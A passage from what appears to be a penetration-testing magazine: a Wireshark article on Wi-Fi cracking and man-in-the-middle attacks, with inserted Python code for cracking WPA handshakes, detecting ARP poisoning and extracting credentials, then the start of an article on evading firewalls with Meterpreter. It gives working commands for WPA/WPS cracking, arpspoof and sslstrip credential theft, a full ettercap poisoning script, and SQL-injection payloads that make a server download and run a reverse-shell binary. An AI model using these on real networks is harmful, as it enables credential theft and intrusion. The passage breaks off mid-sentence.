Examples include hostnames that state the server's role outright. For this reason I always recommend naming conventions that obfuscate potential server types.

Now that we have ascertained host names, IP addresses, the default gateway and even user accounts, we can monitor for a host whose identity we can take over. By replicating the name, IP and MAC address of a workstation we can turn from passive to active and become a part of the network. Using a handy virtual machine that we can rename and change the details of, we can replicate (ghost) a machine's connection to the LAN and start running our usual port scans, and ARP poisoning to capture NTLM hashes, FTP and telnet credentials and the associated user accounts, including their internet traffic. Bear in mind that cloning a live host's IP and MAC causes address conflicts that the real host and the switch will notice, so pick a host that is off the network or do it while it is down.

Something in the air...

If the Cat 5 lead was a dud and we have no connection through wired means, then it is time to flick on the wireless switch and start listening to the traffic drifting through the air. Again this is easy through Wireshark, as our interface listing earlier included wireless interfaces. In my case it's wlan1 (an Alfa Networks AWUS036H USB wireless dongle).

Previous tutorials have covered the method of capturing wireless access point details, devices connecting to wireless, and handshakes in WEP, WPA and WPA2. There are two popular methods of obtaining authentication details for access points in the black hat world. I stress that these must only be used on a network where you have permission to perform a hack attempt, or if you believe your life is in danger and you are locked in a windowless room with just your laptop for company...

Traditional method: WPA2

Briefly, the tools required are airmon-ng and airodump-ng to capture the wireless network names, encryption method and the stations associated with the access point we want to listen to, and then either aircrack-ng or hashcat to crack the key offline from the captured handshake, by dictionary or brute force.

# ifconfig wlan2 down (turn off the Wi-Fi card so we can change the MAC)

# macchanger -m 00:11:22:33:44:55 wlan2 (change the MAC address to 00:11:22:33:44:55 to maintain anonymity, or change it to a valid network MAC in the case of filtering)

# ifconfig wlan2 up (turn the card back on with the new MAC address)

# airmon-ng start wlan2 (this puts the card in monitor mode and creates the monitor interface mon0 used below; it may complain about running services such as NetworkManager or wpa_supplicant, and if any errors occur after this point then consider killing the offending processes)

# airodump-ng mon0 (this starts listening for both wireless access points and wireless stations with Wi-Fi enabled and their associated access points. Control+C out of the search when you have located a suitable access point to attempt to attach to; also check that there are stations associated with that access point, otherwise there is no handshake to intercept.)

It is best to open a new terminal window so we can flick between our access point and station list and the upcoming commands.

# airodump-ng -c <channel> --bssid <AP BSSID> -w saveme mon0

(now we limit our traffic capture to one access point's channel and BSSID and start writing to a file, saveme-01.cap, which we will later attempt to crack).

Once again we sit and wait for traffic to accumulate and for airodump-ng to show "WPA handshake" in its top right corner, confirming we have the data we need to play with. Should you become impatient you can force a station to de-authenticate from the access point with the following command:

# aireplay-ng -0 2 -a <AP BSSID> -c <station MAC> mon0

(this sends two de-authentication frames to the station on behalf of the access point, forcing it to reconnect and perform a fresh four-way handshake that we capture)

The captured handshake can now be cracked offline with aircrack-ng, John, hashcat etc. I have a reasonably powerful Nvidia graphics card so I can use hashcat and my GPU for processing. oclHashcat-plus requires the capture file to be converted to its own .hccap format. The following will clean the capture and create an .hccap file for us:

# wpaclean <cleaned.cap> <saveme-01.cap>
# aircrack-ng <cleaned.cap> -J <handshake>

(wpaclean takes the output file first and the input file second; aircrack-ng -J writes <handshake>.hccap)

To use a wordlist:

# /usr/share/oclhashcat-plus/cudaHashcat-plus64.bin -m 2500 <handshake>.hccap <wordlist>

(The -m 2500 is the format of the hash we are cracking: 2500 is WPA/WPA2, 1000 is NTLM)

To brute force an 8 character password in lowercase, uppercase, numerical and special characters, use the following, but be prepared for a very long wait...

# /usr/share/oclhashcat-plus/cudaHashcat-plus64.bin -m 2500 -a 3 -1 ?l?u?d?s <handshake>.hccap ?1?1?1?1?1?1?1?1

(-a 3 selects mask attack; -1 defines our custom charset: ?l lowercase, ?u uppercase, ?d digits, ?s special characters. Eight positions of 95 characters is 95^8, roughly 6.6 x 10^15 candidates, each costing 4096 rounds of PBKDF2-HMAC-SHA1.)
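What hashcat -m 2500 is actually doing with the .hccap, as an added example that is not part of the article: the WPA-PSK key derivation and MIC check implemented in Python and run as a dictionary attack against a constructed message 2 of the four-way handshake. The SSID, passphrase, MAC addresses and nonces are assumed values made up for the example; the PMK test vector (passphrase "password", SSID "IEEE") is the one published in the IEEE 802.11 standard. The block also computes the keyspace of the -1 ?l?u?d?s ?1x8 mask from the brute-force command above, which makes the "very long wait" concrete.

```python
import hashlib
import hmac
import struct

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations per candidate are what makes cracking slow and GPU-worthy."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, concatenated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]

def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both MACs and both nonces; its first 16 bytes are the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)

MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the MIC

def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 over the frame with the MIC zeroed, 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_handshake_msg2(passphrase, ssid, ap_mac, sta_mac, anonce, snonce):
    """Constructed message 2 (station -> AP) of the four-way handshake with a valid MIC.
    It stands in for the frame airodump-ng captures and aircrack-ng -J packs into the .hccap."""
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1/AES), pairwise, MIC present
    body = (b"\x02" + struct.pack("!HHQ", key_info, 16, 1) + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8      # key IV, key RSC, key ID
            + b"\x00" * 16 + struct.pack("!H", 0))           # MIC placeholder, key data length
    frame = b"\x02\x03" + struct.pack("!H", len(body)) + body   # EAPOL v2, type Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:], mic

def crack_handshake(candidates, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, captured_mic):
    """Offline dictionary attack: PMK -> PTK -> MIC per candidate, compared with the capture.
    Nothing is sent to the access point, which is why this cannot be rate limited."""
    for passphrase in candidates:
        kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return passphrase
    return None

HASHCAT_CHARSETS = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}

def mask_keyspace(mask: str, custom: dict) -> int:
    """Candidates for a hashcat mask, e.g. '?1?1?1?1?1?1?1?1' with custom {'1': '?l?u?d?s'}."""
    def size(spec: str) -> int:
        return sum(HASHCAT_CHARSETS[c] for c in spec.split("?") if c)
    total = 1
    for pos in mask.split("?")[1:]:
        total *= size(custom[pos]) if pos in custom else HASHCAT_CHARSETS[pos]
    return total

def estimate_days(keyspace: int, hashes_per_second: float) -> float:
    """Worst-case days to exhaust a keyspace at an assumed WPA cracking rate."""
    return keyspace / hashes_per_second / 86400
```

At an assumed 100,000 WPA candidates per second (a good single GPU of the period), the 95^8 mask from the article's command needs over two thousand years to exhaust, which is the practical argument for a wordlist plus rules before any mask attack.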

WPS method: WPA/WPA2

The tools required for WPS cracking are airmon-ng, wash and reaver:

# ifconfig wlan2 down (turn off the Wi-Fi card so we can change the MAC)

# macchanger -m 00:11:22:33:44:55 wlan2 (change the MAC address to 00:11:22:33:44:55 to maintain anonymity, or change it to a valid network MAC in the case of filtering)

# ifconfig wlan2 up (turn the card back on with the new MAC address)

# airmon-ng start wlan2 (this puts the card in monitor mode and creates mon0; it may complain about running services, and if any errors occur after this point then consider killing the offending processes)

# wash -i mon0 --scan (this starts wash in active probe and scan mode. It sends probes to all visible access points and displays those that advertise WPS, with the BSSID, channel, ESSID, WPA version and whether WPS is locked)

# reaver -i mon0 -b <AP BSSID> -vv --fail-wait=360 (this starts a brute force of the WPS PIN against the target BSSID, with verbose output so we can confirm it is working, and waits 360 seconds after a failed connection attempt. This is usually sufficient for routers that lock WPS after a number of failed authentications before allowing a reconnect.)

    In my experience Reaver usually takes up to 8 hours to complete a scan and provide a WPS key for most wireless networks.

We are in!!!!

Once we have successfully authenticated to the wireless network (again bearing in mind the possible use of MAC address filtering) we can start a Wireshark capture on the wireless interface and capture traffic to our heart's content. On busy networks be aware that capture files (.cap/.pcap) can grow to gigabytes in size over a relatively short amount of time.

Interception...

Although most networks are very noisy and we can usually pick up a lot of information by just passively listening, in our scenario we want to be more proactive, learn a little more about our captors and start intercepting traffic. If we can capture usernames, passwords and URLs and intercept traffic, we can start to own our target network. This is a standard man-in-the-middle (MiTM) attack.


We are going to route all traffic through our laptop by poisoning the ARP caches of the victim and the gateway.

This is done by starting Wireshark first of all, to capture all the poisoned traffic. The first example poisons only one host and attempts to capture all traffic between it and the gateway:

# arpspoof -i <interface> -t <victim IP> <gateway IP>

(remember to enable IP forwarding, as shown in the next section, or the victim simply loses its connection and notices)

Wireshark contains many pre-configured display filters for particular types of traffic. As mentioned previously, these include NTLM authentication, network broadcasts from servers and appliances, FTP traffic, ARP, device heartbeats, ICMP etc. We can search for specific terms and packets easily using the filter bar above the packet list.

WWW.yourtrafficIsMine

Although full traffic capture between the host and the gateway is good, we will not be able to see any encrypted SSL traffic. For example, if a user is using a popular web-based email system we cannot see the username, password or content of HTTPS traffic. To solve this little issue we can use SSLStrip, which sits in the middle, keeps the HTTPS connection to the server for itself and hands the victim a plain HTTP copy of the page. It relies on the victim first requesting a plain HTTP page that it can rewrite; a site the browser will only ever request over HTTPS (HSTS) is not downgraded.

# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# arpspoof -i wlan2 -t <victim IP> <gateway IP>

(IP forwarding passes the victim's traffic on so the connection keeps working; the iptables rule diverts intercepted port 80 traffic to sslstrip's listening port; and arpspoof basically tells the network to direct all traffic between our victim and the gateway via our laptop, allowing us to intercept and record traffic with Wireshark and other tools.)

# sslstrip -p -w /root/sslstrip.txt

(This writes all POST requests, including usernames and passwords submitted to what would have been HTTPS login pages, to our designated text file; -p logs only POSTs, and sslstrip listens on port 10000 by default, matching the redirect above.)

    Figure 3. Capturing web traffic and SSL certificates as MiTM
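What arpspoof is putting on the wire, and how you would spot it in a capture, as an added example that is not part of the article: a builder and parser for Ethernet/ARP frames, and a detector that walks a list of frames flagging unsolicited replies and an IP address claimed by two MACs (the same symptom Wireshark reports as a duplicate IP address in its expert info). The frames, MAC and IP addresses below are constructed for the example.

```python
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))

def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))

def build_arp(opcode: int, sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an ARP packet; opcode 1 = request, 2 = reply.
    arpspoof -t <victim> <gateway> sends replies with sender_ip = gateway and
    sender_mac = attacker, addressed to the victim, to poison the victim's cache."""
    eth_dst = BROADCAST if opcode == 1 else target_mac
    eth = mac_bytes(eth_dst) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)      # Ethernet, IPv4, hlen, plen, op
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp

def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip), or None if not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    ip = lambda b: ".".join(str(x) for x in b)
    opcode = struct.unpack("!H", frame[20:22])[0]
    return opcode, mac(frame[22:28]), ip(frame[28:32]), mac(frame[32:38]), ip(frame[38:42])

def detect_poisoning(frames):
    """Flag replies nobody asked for, and IPs claimed by more than one MAC:
    the two symptoms of ARP poisoning in a capture."""
    claimed = defaultdict(set)   # ip -> MACs seen claiming it
    pending = set()              # (asker_ip, asked_ip) requests awaiting a reply
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        opcode, smac, sip, tmac, tip = parsed
        if opcode == 1:
            pending.add((sip, tip))
            continue
        if opcode != 2:
            continue
        if (tip, sip) in pending:
            pending.discard((tip, sip))
        else:
            alerts.append(f"unsolicited reply: {sip} is-at {smac} sent to {tip}")
        claimed[sip].add(smac)
        if len(claimed[sip]) > 1:
            alerts.append(f"duplicate address: {sip} claimed by {sorted(claimed[sip])}")
    return alerts

# Constructed capture: the victim asks for the gateway, the real gateway answers,
# then an attacker injects a reply claiming the gateway's IP with its own MAC.
GATEWAY_MAC, VICTIM_MAC, ATTACKER_MAC = "00:11:22:aa:aa:01", "00:11:22:bb:bb:50", "00:11:22:cc:cc:99"
SAMPLE_FRAMES = [
    build_arp(1, VICTIM_MAC, "192.168.1.50", "00:00:00:00:00:00", "192.168.1.1"),
    build_arp(2, GATEWAY_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.50"),
    build_arp(2, ATTACKER_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.50"),
]

if __name__ == "__main__":
    for alert in detect_poisoning(SAMPLE_FRAMES):
        print(alert)
```

The same two checks are what a switch with dynamic ARP inspection applies against its DHCP snooping table; on a network without it, a capture filter of "arp" in Wireshark and this logic are the quickest way to see whether someone else is already doing to you what this section describes.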


Note: At the present time this does not always work for clients running Chrome/Chromium with Google logins, because the browser already knows to request those sites only over HTTPS (a preloaded HSTS list), so there is no plain HTTP request to rewrite.

If you want to capture all HTTP URLs in a nice list format you can open another new terminal and run urlsnarf:

# urlsnarf -i wlan2 | grep http > /root/httplog.txt &

Our Wireshark session is still capturing all the traffic between the victim PC and the gateway. It is also possible to extract all images and web pages from the packet capture file (.pcap) after the fact, although on Kali Linux you will first need to install tcpxtract (when connected to the internet):

# apt-get install tcpxtract

Save the packet capture to a file on your laptop in the default .pcap format and create a new sub-directory for all of the images, HTML pages and video:

# mkdir /root/Capture
# tcpxtract -f /root/packetcap.pcap -o /root/Capture/

If you struggle with the arpspoof application it is possible to use ettercap for the ARP poisoning instead, with iptables providing the port 80 redirect for sslstrip, although in my experience on wireless this can struggle to ARP the whole network. Listing 1 consists of a handy script I found on the internet that has been modified to suit our requirements.

Listing 1. The script for ettercap, sslstrip and iptables

#!/bin/bash
# Poisons the LAN with ettercap, strips SSL with sslstrip and logs URLs with urlsnarf,
# then removes the iptables rules afterwards. Run as root on Kali.
echo "Howdy - this little script can poison all network traffic and route traffic via this PC - including HTTPS. Consider this your warning... Any password captured will be displayed when you kill the program with the letter q. OK, on with the show...."
read -p "Press a key to continue :o)"
echo -n "Do you want to execute Wireshark when done? If yes, press Enter: "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, press Enter: "
read -e XTRACT
echo -n "What interface to use? i.e. wlan0: "
read -e IFACE
echo -n "Name of session? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e GATEWAY
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir -p /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
#### BACKTRACK: python /pentest/web/sslstrip/sslstrip.py -p -w /root/$SESSION/$SESSION.log &
echo "Press S for a traffic status and Q to close nicely."
sslstrip -p -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
# ettercap forwards the intercepted traffic itself; empty GATEWAY/VICTIM gives // //, i.e. the whole subnet
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$GATEWAY/ /$VICTIM/
# If Enter was pressed above the variable is empty and the command runs; any other answer
# becomes a non-existent command and the line fails harmlessly.
$XTRACT tcpxtract -f /root/$SESSION/$SESSION.pcap -o /root/$SESSION/
$NOYES wireshark /root/$SESSION/$SESSION.pcap
## Clean up....
killall sslstrip
##### BACKTRACK: killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci

Who's calling?

With a pre-configured menu for locating both encrypted and non-encrypted Voice over IP traffic, the value of Wireshark soon becomes clear. Protocols supported by default include SIP, H.323, ISUP, MGCP and UNISTIM. The core reason for capturing this traffic is the ability to replay discussions, and even video, from captured conversations. Using the built-in features it is possible to ascertain the start and stop times of calls, details of the call initiator, any authentication types in use (including security certificates), the protocols in use and the call status. If the network you are monitoring has heavy traffic and multiple calls going at once, it is possible to prepare a filter using the menu system on destination, source and protocol.

To replay voice conversations we need to ARP poison the network as above, then save our capture file. So we will start with a brand new Wireshark capture and filter out some of the network noise so we have a better file to work with:

From the main menu select Capture | Capture Filters....

In the Capture Filters dialog select "No Broadcast and no Multicast".

From the main menu select Capture | Start. Once we are happy that we have captured some traffic, and possibly a conversation, we can use the Telephony menu and then VoIP Calls to select our traffic.

    Figure 4. Replaying SIP Voice traffic with built-in tools


The built-in player allows us to listen to the conversation (Figure 4).

Let's see those passwords...

We have been sitting and watching our network traffic for some time now; capturing the traffic to a local file allows dissection and analysis both on-line and off-line. The most commonly used filter in Wireshark for this is HTTP authentication. Although most websites now use SSL, which encrypts traffic between the host and the browser, some older mail services and poorly managed sites will still allow non-encrypted logins. Also, let's face it, most people use the same password for nearly every website, secure or not.

The filter for these in Wireshark is http.authbasic (the Basic credentials decoded to username:password) or http.authorization (the raw header). Or, in the example below, I just ran a string search for the word admin. By using the built-in filters (which auto-complete as you start typing) we can see a list of all traffic used in authentication on insecure web pages. Review the items in the lower section of the console to see the content of a captured packet in both raw hex and decoded text.

The item below shows a captured HTTP authentication packet to the network gateway, a Netgear ADSL router. As we can see the username is admin and the password is set to PasPassr5T (Figure 5).
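The password extraction shown in Figure 5, and the POST logging that sslstrip does in the earlier section, as an added example that is not part of the article: a small credential extractor run over constructed plaintext TCP streams (an HTTP Basic login to a router, an FTP login, and a form POST that sslstrip has downgraded to HTTP). The addresses, FTP account and form fields are made up for the example; the admin / PasPassr5T pair is the one visible in the article's capture, here encoded as the browser would send it.

```python
import base64
import re
from urllib.parse import parse_qs

# Constructed sample streams (not captured data): an HTTP Basic login to a router,
# an FTP login, and a form POST that sslstrip has downgraded to plain HTTP.
SAMPLE_STREAMS = [
    ("192.168.1.50:51122 -> 192.168.1.1:80",
     "GET /setup.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\n"
     "Authorization: Basic YWRtaW46UGFzUGFzc3I1VA==\r\n\r\n"),
    ("192.168.1.50:51200 -> 192.168.1.20:21",
     "USER backup\r\nPASS Winter2013!\r\nSYST\r\n"),
    ("192.168.1.50:51300 -> 203.0.113.10:80",
     "POST /login HTTP/1.1\r\nHost: webmail.example\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 36\r\n\r\n"
     "username=jsmith&password=Summer%2113"),
]

BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.I | re.M)
FTP_USER_RE = re.compile(r"^USER\s+(\S+)", re.M)
FTP_PASS_RE = re.compile(r"^PASS\s+(.*)$", re.M)
USER_FIELDS = ("username", "user", "email", "login")
PASS_FIELDS = ("password", "pass", "passwd")

def extract_credentials(streams):
    """Return (flow, protocol, username, password) for each plaintext credential found
    in a list of (flow description, reassembled client-to-server bytes as text) pairs."""
    found = []
    for flow, data in streams:
        m = BASIC_RE.search(data)
        if m:
            # Basic auth is base64(user:password): encoding, not encryption.
            user, _, pw = base64.b64decode(m.group(1)).decode("latin-1").partition(":")
            found.append((flow, "http-basic", user, pw))
        u, p = FTP_USER_RE.search(data), FTP_PASS_RE.search(data)
        if u and p:
            found.append((flow, "ftp", u.group(1), p.group(1).rstrip("\r")))
        if data.startswith("POST ") and "\r\n\r\n" in data:
            head, _, body = data.partition("\r\n\r\n")
            if "application/x-www-form-urlencoded" in head.lower():
                fields = {k.lower(): v[0] for k, v in parse_qs(body).items()}
                user = next((fields[k] for k in USER_FIELDS if k in fields), None)
                pw = next((fields[k] for k in PASS_FIELDS if k in fields), None)
                if user is not None and pw is not None:
                    found.append((flow, "http-post", user, pw))
    return found

if __name__ == "__main__":
    for flow, proto, user, pw in extract_credentials(SAMPLE_STREAMS):
        print(f"{flow}  {proto:10s} {user} / {pw}")
```

Wireshark's Follow TCP Stream output for a flow is exactly the kind of text this expects, so the same function can be pointed at streams exported from the article's capture; Digest authentication would not fall out of it, since only a hash of the password crosses the wire.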

It wasn't me!

Most definitely worth a mention is how Wireshark is used in my day-to-day life as a penetration tester. The forensic and recording value of Wireshark provides me with a full record of all of my security assurance testing during a scan. This can prove invaluable when tracking down any issues reported with kit that has been scanned (and even with kit that has not). Many times I have had servers or appliances crash during the scanning process, and with the help of Wireshark I can either prove which commands or process caused the issue or, more importantly, prove I was nowhere near the troublesome box at the time of a potential incident....

Lee Alexander King, Sophlee Ltd

Lee is an Information Assurance and IT Security professional and has worked on several programmes for HMG, MoD and NATO. He has extensive experience of: pentesting and vulnerability assessments, HMG security policies, JSP440, RMADS, CESG InfoSec Memoranda, ISO27001, security policies and procedures, security assurance, accreditation requirements and risk assessments. Email: [email protected].

    Figure 5. Web page password capture



Bypassing new generation firewalls with Meterpreter and SSH tunnels

During a recent penetration test I found a Windows host running a web application that let me execute code via an SQL injection. The host was a Windows Server 2003 machine with SQL Server 2005. It was part of a local area network (LAN), and my intention was to use it to pivot to other hosts on the LAN, create myself a Domain Administrator account and take possession of the entire network.

At this point, my attack vector was very clear:

- Upload and run a meterpreter payload to get a remote session.
- Escalate privileges on the remote host.
- Capture the hash of the Administrator to use it on other hosts.
- Use a delegation token of a Domain Admin user to impersonate it, and use it to create a Domain Administrator user.
- Use the host as a gateway to access other hosts and servers on the LAN.

In testing the above attack vector, some problems were detected that had to be solved to achieve the ultimate goal.

The main problem was that after uploading a reverse meterpreter payload to the host and running it, the reverse connection did not reach its destination.

My first thought was that a firewall was blocking access to unusual ports, so I repeated the process, this time using a payload that tried to connect to port 80 of my machine, but that did not work either.

The same test using netcat worked, so I figured out that the problem was related to the firewall blocking meterpreter packets, probably because it was a deep inspection firewall with meterpreter's signatures in its signature file.

To solve the problem I used encryption, since a firewall can only inspect packets in the clear, not encrypted ones. To ensure the packets were encrypted end-to-end (from the compromised machine to my local machine), I used an SSH tunnel, successfully bypassing that security barrier.

In this article I will try to explain step by step all the processes involved in bypassing the deep inspection firewall and achieving a meterpreter session with the remote host. The reason for wanting a meterpreter session is the ease with which you can escalate privileges and pivot to other hosts from the Metasploit Framework.

The process is summarized as follows:

- Upload the necessary tools to the remote host.
- Establish an SSH tunnel forwarding the needed ports.
- Launch the meterpreter payload through the tunnel.
- Receive the meterpreter session on the other side of the tunnel.

How to upload the payload?

When we have access to a Linux system we usually have no problem uploading files, because almost any Linux distribution comes with wget or curl, so we just need a web server to publish the binaries and download them using either of these tools. But in Windows things are different. By default we do not have any of these tools or similar ones. We could try to open Internet Explorer or Firefox, if installed, to download the file, but there is a danger that the program ends up waiting for user interaction, and not being in front of the screen that would be a problem.

So what I did (surely there are other ways) was to use the ftp command from Windows.

By default ftp is an interactive program. When executed it asks for a username and password to log in. Once logged in, the desired commands can be entered, ending the session with bye.

But the Windows ftp client can also be used non-interactively, passing in a text file all the lines you need to send to the FTP server. This is achieved with -s:file.txt.

These are the steps I used to upload the files:

First, I leave a file called met.exe (the reverse meterpreter payload) on a public FTP server.

Using the SQL injection I found, inject the following system command:

;exec master..xp_cmdshell '(echo ftp& echo kk@& echo bin& echo get met.exe& echo bye) >ftp.txt';exec master..xp_cmdshell 'ftp -s:ftp.txt IPServerFTP'; --

This injection creates the file ftp.txt with the following contents:

ftp
kk@
bin
get met.exe
bye

And then calls the ftp command passing as parameters -s: and the file we just created.

The result is that the host connects to the FTP server, authenticates an anonymous session (username ftp, password kk@), executes the bin command to switch to binary mode, executes get met.exe, which downloads the file onto the system, and ends the FTP session with the bye command.

At this moment we have the payload on the remote host, and we only need to run it with another SQL injection, and put a Metasploit handler on the attacker host to get a meterpreter session.

This is the SQL injection we would use:

;exec master..xp_cmdshell 'start /B met.exe';--

The /B switch of the start command prevents a cmd window from opening while the program runs. We could also have simply called met.exe, but this would have left the process running inside the query, and for another injection we would have had to open a new window, because if it was cancelled or closed the meterpreter session died unless it h